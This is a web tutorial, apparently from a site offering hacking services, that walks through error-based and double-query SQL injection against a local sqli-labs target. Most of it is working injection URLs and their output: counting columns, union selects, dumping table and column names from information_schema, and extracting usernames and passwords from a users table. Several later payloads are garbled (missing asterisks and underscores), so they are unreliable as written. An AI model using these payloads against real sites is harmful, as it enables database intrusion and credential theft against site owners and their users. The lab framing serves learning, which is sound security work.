Basic to Advanced Error Based SQL Injection Tutorial

Today we will show you how to hack a website using error-based SQL injection step by step. In this tutorial, you are going to learn a basic and advanced technique for Error-based SQL Injection. We don’t only provide you professional hacking services, also we let you know how hacking work.

Our target: http://192.168.27.132/sqli/Less-1/?id=2

Let’s do it step by step.

To test if the site is a vulnerability we request the URL with a single quote in the parameter:


http://192.168.27.132/sqli/Less-1/?id=2'


And its output:


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1

We need to find how many columns in there:


http://192.168.27.132/sqli/Less-1/?id=2' order100–+ : Error:- Unknown column '100' in 'order clause'
http://192.168.27.132/sqli/Less-1/?id=2%27%20order%20by%2050–+ : Did not work.
http://192.168.27.132/sqli/Less-1/?id=2%27%20order%20by%2020–+ : Still error
http://192.168.27.132/sqli/Less-1/?id=2%27%20order%20by%203–+ : The page is normally loaded.
Now we need to see which column is vulnerable:
http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,3–+ 

This shows 2 and 3 column number is vulnerable.

Exploiting The simple Error based SQL Injection

This is a simple error-based SQL injection and easy to exploit. We will see how it can be exploited with some SQL query

Getting the Database and the Version

we just need to replace the vulnerable column with version():

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,version()--+
Output: 10.3.18-MariaDB-0+deb10u1

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,database()--+
Output: security

Getting all tables name

We also can get all the table’s names of database ‘security’. Here we need to use an SQL function group and concat(). For more details, you should google search “group_contact()”.http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22--+
Output: emails,referers,uagents,users

We have the tables’ names. Now we can get columns to name for each table

Getting Columns name

Here we need to replace a few things:
1. group_concat(table_name) should be group_concat(column_name)
2. informationschema.tables should be information_schema_columns
3. “where table
name=table”

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%22users%22--+
Output: id,username,password,USER,CURRENTCONNECTIONS,TOTALCONNECTIONS

Extracting the username and password

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20users--+
Output: Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4

Double Query Error Based SQL Injection

Let’s cover one more advanced Error Based SQL injection in one post. We want to remind you that, error based sql injection is forcing the database to generate errors as we want. Sometimes simple errors not what we want. For this, we need some more complex SQL queries to send to the database. Let’s see it step by step.

Another note this time, we need to send Double quote instead of single: http://192.168.27.132/sqli/Less-6/?id=2"

If you send your command like http://192.168.27.132/sqli/Less-6/?id=-2%20order%20by%2050–+ , it does not work anymore. Let’s see how we can exploit this SQL Injection Vulnerability.

Testing the Double Query SQLi in Mariadb

As we need to use some additional functions, we are first going to test the SQL injection in MariaDB locally. Here is the functions we need to learn about:

  1. rand(): This function generates random numbers.
  2. floor(): This function return largest number.
  3. limit: This is an SQL clause and used to constrain the number of rows to return.

Let us paste some query and their output.

MariaDB [(none)]> select rand();
+--------------------+
| rand()             |
+--------------------+
| 0.5695128837316417 |
+--------------------+
1 row in set (0.003 sec)

MariaDB [(none)]> select concat('test','test2');
+------------------------+
| concat('test','test2') |
+------------------------+
| testtest2              |
+------------------------+
1 row in set (0.001 sec)

MariaDB [(none)]> select floor(4.4494949);
+------------------+
| floor(4.4494949) |
+------------------+
|                4 |
+------------------+
1 row in set (0.002 sec)

MariaDB [(none)]> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
|               0 |
+-----------------+
1 row in set (0.001 sec)

MariaDB [(none)]> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
|               1 |
+-----------------+
1 row in set (0.001 sec)

Let us do some Subquery test:

select database() from information_schema.tables

MariaDB [(none)]> (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,floor(rand(0)*2)) a from information_schema.tables group by a) b);
ERROR 1062 (23000): Duplicate entry 'emails:1' for key 'group_key'
MariaDB [(none)]> 

Exploiting Error Based SQL Injection with Sub Query

Our goal is showing you how to exploit real vulnerability instead of making you bore with lots of small examples. But for testing and learning purposes, we have set up a local lab. After all, this is some kind of tutorial … right?

Before forward Please take some time to understand this query template:

and (select 1 from(select count(),concat(subquery limit singleinfo,single_info),floor(rand(0)2) alias from information_schema.tables group by a) b)

Let’s do it step by now.

Getting the database name:


http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select database()),0x3a,floor(rand(0)2))a from informationschema.tables group by a) b)--

Getting the tables name from database “security”:

1.http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select tablename from informationschema.tables where table_schema="security" limit 0,1),0x3a,floor(rand(0)*2))a from informationschema.tables group by a) b)-- 

2. http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select tablename from informationschema.tables where table_schema="security" limit 1,1),0x3a,floor(rand(0)*2))a from informationschema.tables group by a) b)-- 

3. http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select tablename from informationschema.tables where table_schema="security" limit 3,1),0x3a,floor(rand(0)*2))a from informationschema.tables group by a) b)-- 

Get columns name:

Username Column: http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select columnname from informationschema.columns where tableschema='security' and tablename='users' limit 1,1),0x3a,floor(rand(0)*2))a from informationschema.tables group by a) b)-- 
 
Password Column: http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select columnname from informationschema.columns where tableschema='security' and tablename='users' limit 2,1),0x3a,floor(rand(0)*2))a from informationschema.tables group by a) b)-- 

Extracting data from columns:

http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(),Concat((select concat(username,0x3a,password) from users limit 0,1),0x3a,floor(rand(0)*2))a from informationschema.tables group by a) b)--  

Finally, we would say, Error based SQL Injection is a time-consuming process but better than Time based SQL injection. We can speed up the process by using a python script or burp suite tool.

Setup your Home SQL Injection LAB: https://github.com/Rock718/sqli-labs-php7

If you need any hacking related questions, don’t hesitate to contact us.

Leave a Comment